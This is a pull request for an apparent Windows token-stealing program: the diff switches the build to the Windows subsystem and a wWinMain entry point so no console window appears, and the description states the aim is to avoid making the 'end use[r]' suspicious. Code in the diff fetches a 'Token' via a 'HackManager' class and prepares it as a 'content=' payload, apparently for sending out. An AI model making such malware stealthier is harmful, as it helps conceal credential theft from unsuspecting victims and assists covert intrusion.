### PR TITLE
fix console flicker when opening application

### DIFF
--- a/DoggyFucker.vcxproj
+++ b/DoggyFucker.vcxproj
@@ -146,7 +146,7 @@
       <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
     </ClCompile>
     <Link>
-      <SubSystem>Console</SubSystem>
+      <SubSystem>Windows</SubSystem>
       <EnableCOMDATFolding>true</EnableCOMDATFolding>
       <OptimizeReferences>true</OptimizeReferences>
       <GenerateDebugInformation>true</GenerateDebugInformation>

--- a/Main.cpp
+++ b/Main.cpp
@@ -7,9 +7,8 @@ unsigned char HEADER[] = {
     0x00, 0x00, 0x00, 0x43, 0x00, 0x00, 0x00, 0x3B, 0x00, 0x00, 0x00
 };
 
-int main()
+int WINAPI wWinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, PWSTR pCmdLine, int nCmdShow)
 {
-    ::ShowWindow(::GetConsoleWindow(), SW_HIDE);
     auto Token = HackManager().GetLocation(HEADER, sizeof(HEADER));
     if (Token.length() > 0) {
         Token = "content=" + Token;


### PR DESCRIPTION
fix console flicker when opening application, could make an end use be more spooked by this application further if a console briefly opens, an update to the project settings (linker) and entrypoint fixes this 